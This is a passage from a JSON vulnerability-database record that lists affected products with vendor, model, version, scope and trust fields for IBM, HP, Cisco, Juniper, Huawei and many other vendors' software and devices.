        "vendor": "ibm",
        "version": null
      },
      {
        "model": "nac manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "splunk",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "6.0.4"
      },
      {
        "model": "aura communication manager utility services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "smc2.0 v100r002c01b017sp17",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "storevirtual 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "463012.6"
      },
      {
        "model": "laserjet cm3530 multifunction printer cc519a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "53.236.1"
      },
      {
        "model": "laserjet pro color mfp m276n/nw cf144a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "20020140919"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "58000"
      },
      {
        "model": "color laserjet cm4730 multifunction printer cb481a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "email appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sophos",
        "version": "3.7.0.0"
      },
      {
        "model": "email security gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.8.3"
      },
      {
        "model": "junos os 12.1x46-d20",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "player",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "10.0.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "4.0.10"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.43"
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "4.3.13"
      },
      {
        "model": "junos 12.2r4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "one-x communicator for mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "x1.0.4"
      },
      {
        "model": "network connect 7.4r5",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "msa storage gl200r007",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1040"
      },
      {
        "model": "winscp",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "winscp",
        "version": "5.1.4"
      },
      {
        "model": "tivoli workload scheduler distributed",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.10"
      },
      {
        "model": "unified ip phone",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "89450"
      },
      {
        "model": "rox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "11.16.1"
      },
      {
        "model": "icewall sso dfw",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.0"
      },
      {
        "model": "usg2000 v300r001c10sph201",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "laserjet p4014 cb506a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.0"
      },
      {
        "model": "arubaos",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "arubanetworks",
        "version": "6.3.1.8"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "4.0"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "7.6"
      },
      {
        "model": "system x3500m3 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "73801.42"
      },
      {
        "model": "licensing",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "0"
      },
      {
        "model": "ive os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "8.0"
      },
      {
        "model": "system m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x325025830"
      },
      {
        "model": "integrated management module ii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.53"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.9"
      },
      {
        "model": "fortimail",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.1.2"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.3"
      },
      {
        "model": "storevirtual 600gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.5"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.3.0"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "storevirtual 600gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "473012.5"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "2.1.5"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.00"
      },
      {
        "model": "service delivery manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.2"
      },
      {
        "model": "enterprise content management system monitor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.1"
      },
      {
        "model": "storevirtual 900gb china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.5"
      },
      {
        "model": "switch series (comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10500v7)0"
      },
      {
        "model": "web gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "7.3.2.6"
      },
      {
        "model": "idol image server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "10.7"
      },
      {
        "model": "ecns600 v100r002c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "espace u19** v100r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "project openssl 1.0.0c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "sbr carrier",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "7.5"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1.0"
      },
      {
        "model": "spa112 2-port phone adapter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "cloudplatform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "4.2.1-x"
      },
      {
        "model": "watson explorer security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "laserjet enterprise color m551 series cf081a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5000"
      },
      {
        "model": "netscaler",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.0"
      },
      {
        "model": "universal small cell series software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "70003.4.20"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6.2"
      },
      {
        "model": "oceanstor s5600t v100r005c30spc100",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "9.0--releng",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "laserjet enterprise color m855 a2w78a 2302963 436076",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "800"
      },
      {
        "model": "one-x communicator for mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "x1.0.2"
      },
      {
        "model": "color laserjet printer series q5984a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "380046.80.8"
      },
      {
        "model": "simatic cp1543-1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "1.1"
      },
      {
        "model": "power express f/c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "52056330"
      },
      {
        "model": "color laserjet cp5525 ce707a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "9.0-releng",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "system dx360m2 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "73231.42"
      },
      {
        "model": "storevirtual china hybrid san solution",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433512.5"
      },
      {
        "model": "psb email and server security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "10.00"
      },
      {
        "model": "netscaler",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "9.3-66.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.23"
      },
      {
        "model": "laserjet p4014 cb507a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.213.1"
      },
      {
        "model": "bladecenter js43 with feature code",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7778-23x8446)0"
      },
      {
        "model": "toolscenter suite",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.53"
      },
      {
        "model": "unified communications series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "5000"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.0.18"
      },
      {
        "model": "junos space 11.4r5.5",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "system storage ts2900 tape library",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "0026"
      },
      {
        "model": "junos 12.1r7-s1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "8.4-release-p12",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "netcool/system service monitor fix pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.014"
      },
      {
        "model": "exalogic",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "x2-22.0.6.2.0"
      },
      {
        "model": "color laserjet m680 cz248a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "bbm for android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rim",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.46"
      },
      {
        "model": "fortianalyzer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.5"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.6.0"
      },
      {
        "model": "color laserjet enterprise cp4025 cc489a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.164.1"
      },
      {
        "model": "rational insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "tivoli management framework",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1.1"
      },
      {
        "model": "laserjet m3027 multifunction printer cb416a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "security information and event management hf11",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "mcafee",
        "version": "9.3.2"
      },
      {
        "model": "laserjet pro mfp m425dn/dw cf288a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "40020140919"
      },
      {
        "model": "snapdrive for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.2"
      },
      {
        "model": "junos 12.1r5-s3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.12"
      },
      {
        "model": "system m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x363071580"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.8"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.29"
      },
      {
        "model": "asset manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.30"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.4"
      },
      {
        "model": "linerate",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "2.2.1"
      },
      {
        "model": "xenclient enterprise",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "5.1.1"
      },
      {
        "model": "content analysis system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.1"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "vsphere storage appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5.1"
      },
      {
        "model": "aura experience portal sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "junos space",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1"
      },
      {
        "model": "big-iq cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.1"
      },
      {
        "model": "elan",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "8.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.15"
      },
      {
        "model": "tivoli storage productivity center fp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.2"
      },
      {
        "model": "storevirtual 450gb sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.6"
      },
      {
        "model": "netscaler",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "citrix",
        "version": "10.0"
      },
      {
        "model": "laserjet m5035 multifunction printer q7831a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.306.1"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1x46"
      },
      {
        "model": "cacheflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "2.2"
      },
      {
        "model": "one-x communicator for microsoft windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.5"
      },
      {
        "model": "msr2000 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6.5"
      },
      {
        "model": "email security gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "websense",
        "version": "7.8.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1"
      },
      {
        "model": "initiate master data service provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "storevirtual 3tb mdl sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.0"
      },
      {
        "model": "aura presence services sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "color laserjet printer series cb433a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "470046.230.6"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "6.3"
      },
      {
        "model": "laserjet enterprise m712 series cf236a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7000"
      },
      {
        "model": "open source security information management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "alienvault",
        "version": "3.1.12"
      },
      {
        "model": "tivoli netcool/system service monitor fp9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "communicator for ipad",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "2.0.1"
      },
      {
        "model": "color laserjet printer series q7535a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "300046.80.2"
      },
      {
        "model": "data ontap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "8.1.2"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.7"
      },
      {
        "model": "aura system platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0.2"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.3"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "storevirtual 450gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.0"
      },
      {
        "model": "aura experience portal",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.0"
      },
      {
        "model": "svn2200 v200r001c01hp0001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "storevirtual fc 900gb china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "bladecenter js12 express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "(7998-60x)0"
      },
      {
        "model": "rational reporting for development intelligence",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.12"
      },
      {
        "model": "project openssl beta3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0"
      },
      {
        "model": "laserjet multifunction printer series q3943a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "43459.310.2"
      },
      {
        "model": "usg9500 v300r001c01spc300",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "laserjet p4015 cb526a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.213.1"
      },
      {
        "model": "rational clearquest",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0.0.7"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.0"
      },
      {
        "model": "cms r16 r6",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.2"
      },
      {
        "model": "system x3200m3 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "73271.42"
      },
      {
        "model": "client applications",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.1"
      },
      {
        "model": "websphere cast iron cloud integration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.115"
      },
      {
        "model": "cit",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.52"
      },
      {
        "model": "storevirtual 1tb mdl sas storage/s-buy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.5"
      },
      {
        "model": "flashsystem 9840-ae1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "840"
      },
      {
        "model": "sterling connect:direct for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.1"
      },
      {
        "model": "management center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.3.2.1"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.2.12"
      },
      {
        "model": "storevirtual 450gb china sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.0"
      },
      {
        "model": "color laserjet cp3505 printer series ce491a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "3.160.2"
      },
      {
        "model": "laserjet m5035 multifunction printer q7830a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "algo one",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0"
      },
      {
        "model": "network connect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "6.4.0.15779"
      },
      {
        "model": "color laserjet cp3525 cc468a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.183.1"
      },
      {
        "model": "open systems snapvault",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.6"
      },
      {
        "model": "8.4-release-p4",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "aura application server sip core pb5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "53003.0"
      },
      {
        "model": "view client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "4.0"
      },
      {
        "model": "host agent for oncommand core package",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "0"
      },
      {
        "model": "mcp russian version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "66000"
      },
      {
        "model": "storevirtual 1tb mdl sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.6"
      },
      {
        "model": "network connect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "6.0.0.12141"
      },
      {
        "model": "real-time compression appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.9.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.159"
      },
      {
        "model": "storevirtual 600gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "453012.6"
      },
      {
        "model": "ecns610 v100r001c00",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.24"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.93"
      },
      {
        "model": "color laserjet printer series q7495a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "470046.230.6"
      },
      {
        "model": "a6600 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "netezza platform software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.0.817"
      },
      {
        "model": "laserjet enterprise m602 series ce991a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6000"
      },
      {
        "model": "f5000 family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "color laserjet cm6030 multifunction printer ce664a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "52.256.1"
      },
      {
        "model": "9.2-release-p8",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "fortios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "fortinet",
        "version": "5.0.1"
      },
      {
        "model": "color laserjet enterprise cp4025 cc489a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "network connect 7.4r9.1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vcsa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.0"
      },
      {
        "model": "idataplex dx360 m4 type",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "79130"
      },
      {
        "model": "protection service for email",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f secure",
        "version": "7.5"
      },
      {
        "model": "color laserjet cp3525 cc471a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.183.1"
      },
      {
        "model": "laserjet enterprise flow mfp m525c cf118a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "junos r11",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1"
      },
      {
        "model": "proventia network security controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.913"
      },
      {
        "model": "laserjet enterprise color flow mfp m575c cd646a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "laserjet m3035 multifunction printer cb415a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.306.1"
      },
      {
        "model": "junos 10.4s13",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "6.0"
      },
      {
        "model": "data ontap",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netapp",
        "version": "7.3"
      },
      {
        "model": "laserjet cm3530 multifunction printer cc520a",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "48.306.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.7"
      },
      {
        "model": "sdn for virtual environments",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.0"
      },
      {
        "model": "oceanstor s5600t v100r001",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "7.2"
      },
      {
        "model": "junos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "juniper",
        "version": "12.1x47"
      },
      {
        "model": "espace iad v300r002",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "storevirtual fc 900gb sas storage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "433012.6"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.44"
      },
      {
        "model": "color laserjet cp5525 ce708a 2302963 436070",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "cognos express",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.1"
      },
      {
        "model": "pk family",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1810v10"
      },
      {
        "model": "color laserjet cp6015 q3935a",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "3par service processor sp-4.2.0.ga-29.p002",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "3.1.10"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.1"
      },
      {
        "model": "telepresence server on virtual machine",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "0"
      },
      {
        "model": "laserjet enterprise m602 series ce993a 2302963 436082",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
